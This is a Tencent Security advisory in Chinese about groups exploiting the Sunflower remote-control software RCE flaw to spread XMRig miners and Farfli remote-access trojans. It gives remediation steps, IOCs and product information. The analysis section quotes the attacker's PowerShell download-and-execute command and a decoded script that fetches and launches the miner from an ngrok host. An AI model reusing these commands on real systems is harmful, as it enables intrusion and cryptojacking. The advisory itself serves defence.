多個黑產團伙利用向日葵遠控軟體RCE漏洞攻擊傳播

騰訊安全發表於2022-03-21

一、概述

近日,騰訊安全威脅情報中心檢測到有挖礦、遠控黑產團伙利用向日葵遠控軟體RCE漏洞攻擊企業主機和個人電腦,已有部分未修復漏洞的主機、個人電腦受害。攻擊者利用漏洞入侵後可直接獲得系統控制權,受害主機已被用於門羅幣挖礦。

 

在部分城市因疫情管理需要,遠端辦公場景增多,向日葵類遠端控制軟體的應用也會增加,從而系統被駭客利用漏洞入侵控制的風險也隨之增加。騰訊安全專家建議政企機構與個人電腦使用者將向日葵遠控軟體升級到最新版本以修復漏洞,建議避免將不必要的埠及服務在公網開放,避免將個人遠控軟體安裝在業務伺服器中。推薦使用騰訊零信任iOA、或騰訊電腦管家進行病毒掃描,排查系統是否已被入侵,採用零信任iOA解決遠端安全接入需求,避免疫情期間系統被駭客控制而造成損失。

 

向日葵是一款免費的,集遠端控制電腦、手機、遠端桌面連線、遠端開機、遠端管理、支援內網穿透等功能的一體化遠端控制管理軟體。今年2月,向日葵個人版V11.0.0.33之前的版本與簡約版V1.0.1.43315(2021.12)之前的版本被披露存在遠端程式碼執行RCE漏洞,漏洞編號CNVD-2022-10270,CNVD-2022-03672

 

存在漏洞的系統啟動服務端軟體後,會開放未授權訪問埠,攻擊者可透過未授權訪問無需密碼直接獲取session,並藉此遠端執行任意程式碼。從而導致存在漏洞的個人電腦或伺服器被駭客入侵控制。

 

在上述高危漏洞出現後,騰訊安全旗下的主機安全產品、零信任iOA、漏洞掃描服務、高危威脅檢測系統均已支援對向日葵RCE漏洞的檢測和防禦。

多個黑產團伙利用向日葵遠控軟體RCE漏洞攻擊傳播 

騰訊零信任iOA攔截利用向日葵RCE漏洞的攻擊

 

本次利用向日葵遠端程式碼執行漏洞攻擊傳播的挖礦木馬為XMRig(門羅幣)挖礦程式,企業或個人使用者可參考以下內容自查後清理:

1.檢視工作管理員,結束高CPU/GPU佔用的程式;

2.檢視c:\users\public\目錄下是否存在木馬檔案xmrig.exeWinRing0x64.sysconfig.json如果有,就刪除這些檔案。

 

遠控木馬使用Farfli家族開原始碼編譯而成,自查與清理方式:

1.檢視Svchost下的服務名,清理服務NETRUDSL

透過執行msconfig,或regedit檢查以下相關係統服務是否存在:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost

 

2.刪除遠控木馬檔案

C:\Windows\33649531.dll(在不同主機上33649531為隨機8位數字)

 

騰訊安全系列產品已支援檢測、查殺利用向日葵遠端程式碼執行漏洞攻擊傳播的XMRig類挖礦木馬與Farfli家族遠控木馬,具體響應清單如下:

應用場景

安全產品

解決方案

騰訊T-Sec

威脅情報雲查服務

(SaaS)

1)xmrig挖礦木馬與Farfli遠控木馬相關IOCs已入庫。

各類安全產品可透過“威脅情報雲查服務”提供的介面提升威脅識別能力。可參考:https://cloud.tencent.com/product/tics

騰訊T-Sec

高階威脅追溯系統

1)XMRig類挖礦木馬與Farfli家族遠控木馬相關資訊和情報已支援檢索。

網管可透過威脅追溯系統,分析日誌,進行線索研判、追溯網路入侵源頭。T-Sec高階威脅追溯系統的更多資訊,可參考:https://cloud.tencent.com/product/atts


雲原生

安全

防護

雲防火牆

(CFW)

基於網路流量進行威脅檢測與主動攔截,已支援向日葵遠端控制工具遠端程式碼執行漏洞CNVD-2022-10270,CNVD-2022-03672利用檢測。

 

有關雲防火牆的更多資訊,可參考:
https://cloud.tencent.com/product/cfw

騰訊T-Sec  主機安全

(CWP)

1)已支援查殺XMRig類挖礦木馬與Farfli家族遠控木馬

2)已支援檢測向日葵遠端控制工具遠端程式碼執行漏洞;

3)已支援檢測利用向日葵遠端控制工具遠端程式碼執行漏洞發起的攻擊。

 

騰訊主機安全(雲鏡)提供雲上終端的防毒防毒、防入侵、漏洞管理、基線管理等。關於T-Sec主機安全的更多資訊,可參考:https://cloud.tencent.com/product/cwp


騰訊T-Sec 安全運營中心(SOC

基於客戶雲端安全資料和騰訊安全大資料的雲安全運營平臺。已接入騰訊主機安全(雲鏡)、騰訊御知等產品資料匯入,為客戶提供漏洞情報、威脅發現、事件處置、基線合規、及洩漏監測、風險可視等能力。

 

關於騰訊T-Sec安全運營中心的更多資訊,可參考:https://s.tencent.com/product/soc/index.html


非雲企業安全防護

騰訊T-Sec

高階威脅檢測

(騰訊御界)

已支援向日葵遠端控制工具遠端程式碼執行漏洞CNVD-2022-10270,CNVD-2022-03672利用檢測。

 

關於T-Sec高階威脅檢測系統的更多資訊,可參考:

https://cloud.tencent.com/product/nta

騰訊iOA零信任

(IOA

1)已支援查殺XMRig類挖礦木馬與Farfli家族遠控木馬

2)已支援檢測利用向日葵遠端控制工具遠端程式碼執行漏洞發起的攻擊。

 

關於T-Sec iOA零信任安全管理系統的更多資訊,可參考:https://s.tencent.com/product/5


更多產品資訊,請參考騰訊安全官方網站https://s.tencent.com/

二、詳細分析

2.1挖礦木馬

利用漏洞投遞並執行惡意指令碼:

ping../../../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe -exec bypass -noexit -C IEX (new-object system.net.webclient).downloadstring(/"http://pingce.jp.ngrok.io/ob.ps1/")

 

指令碼內容解碼後如下:

$url = "http://pingce.jp.ngrok.io/xmrig.exe"

$url2 = "http://pingce.jp.ngrok.io/config.json"

$url3 = "http://pingce.jp.ngrok.io/WinRing0x64.sys"

 

$output = "C:\users\public\xmrig.exe"

$output2 = "C:\users\public\config.json"

$output3 = "C:\users\public\WinRing0x64.sys"

 

$wc = New-Object System.Net.WebClient

$wc.DownloadFile($url, $output)

$wc.DownloadFile($url2, $output2)

$wc.DownloadFile($url3, $output3)

 

taskkill /f /t /im xmrig.exe

Remove-Item -Path "C:\Users\public\c3pool" -Recurse

Start-Sleep -s 15

start-process "c:\users\public\xmrig.exe" -ArgumentList "-c c:\users\public\config.json"

 

釋放系統挖礦程式,啟動指定配置的XMRig挖礦程式。

 

2.2遠控木馬

木馬外殼分割槽段裝載遠控木馬,tProtectVirtualMemory修改記憶體屬性為可讀可執行。

多個黑產團伙利用向日葵遠控軟體RCE漏洞攻擊傳播

 

最終釋放出的可執行檔案為Farfli家族開原始碼編譯而成的遠控木馬。

 多個黑產團伙利用向日葵遠控軟體RCE漏洞攻擊傳播

 

該木馬對外提供的功能模組

模組

功能

Install

svchost.exe -k "NETRUDSL"安裝服務,實現開機自啟動

服務路徑:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Svchost

服務名:NETRUDSL

Dll路徑:C:\Windows\33649531.dll(不同主機33649531隨機8位數)

Uninstall

刪除服務

ServiceMain

開源的Farfli遠控木馬的功能模組包含檔案管理、鍵盤記錄、遠端桌面控制、系統管理、影片檢視、語音監聽、遠端定位等遠端操縱功能

 

例如本樣本中的遠端桌面控制功能,透過修改兩個登錄檔項配置可遠端訪問,並設定遠端登入tcp會話作為控制檯會話,繞過網路對於tcp遠端訪問的限制,修改的登錄檔專案如下:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\TSUserEnabled

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\TSAppCompat

 

三、威脅處置手冊

1.清理木馬

雲主機使用者可使用騰訊主機安全的快掃功能,清理查殺利用向日葵遠控RCE漏洞攻擊傳播的後門木馬:
透過騰訊主機安全(雲鏡)控制檯,入侵檢測->檔案查殺,檢測全網資產,檢測惡意檔案,若發現,可進行一鍵隔離操作。

 

步驟如下:

A: 主機安全(雲鏡)控制檯:入侵檢測->檔案查殺,選擇一鍵檢測:

 多個黑產團伙利用向日葵遠控軟體RCE漏洞攻擊傳播

 

B:彈出一鍵檢測設定,選擇快速掃描,全部專業版主機後開啟掃描:

 多個黑產團伙利用向日葵遠控軟體RCE漏洞攻擊傳播

 

C:檢視掃描出的木馬風險結果項

多個黑產團伙利用向日葵遠控軟體RCE漏洞攻擊傳播 

 

D:對檢出的木馬檔案進行一鍵隔離(注意勾選隔離同時結束木馬程式選項)

 多個黑產團伙利用向日葵遠控軟體RCE漏洞攻擊傳播

 

2. 修復漏洞

雲主機可使用騰訊主機安全(雲鏡)的漏洞檢測修復功能,協助使用者快速修補相關高危漏洞,使用者可登入騰訊主機安全控制檯,依次開啟左側漏洞管理,對掃描到的系統元件漏洞、web應用漏洞、應用漏洞進行排查。

 

步驟細節如下:
A:主機安全(雲鏡)控制檯:開啟漏洞管理->漏洞風險檢測,點選一鍵檢測,進行資產漏洞掃描

 多個黑產團伙利用向日葵遠控軟體RCE漏洞攻擊傳播

 

B:檢視掃描到的向日葵遠端程式碼執行漏洞風險專案詳情

 多個黑產團伙利用向日葵遠控軟體RCE漏洞攻擊傳播

 

C根據檢測結果,對檢測到有風險的資產進行漏洞修復(登入相應主機,升級向日葵遠控工具軟體到最新版本)。


D:回到主機安全(雲鏡)控制檯再次開啟漏洞管理,重新檢測確保資產已不受漏洞影響。

 

3.防禦

騰訊雲防火牆支援檢測防禦利用向日葵遠端程式碼執行漏洞攻擊,公有云客戶可以開通騰訊雲防火牆高階版進行有效防禦:

在騰訊雲控制檯介面,開啟入侵防禦設定即可。

 多個黑產團伙利用向日葵遠控軟體RCE漏洞攻擊傳播

IOCs

【挖礦木馬】

Domain

pingce[.]jp[.]ngrok[.]io

 

md5

0c0195c48b6b8582fa6f6373032118da

e6d26c76401c990bc94f4131350cde3e

【遠控】

C2

s1[.]yk[.]hyi8mc[.]top

 

md5

3f5da20aff1364faa177e90ac325cbd0

dd4786854b9e61fa1637d69a3eb71f93


相關文章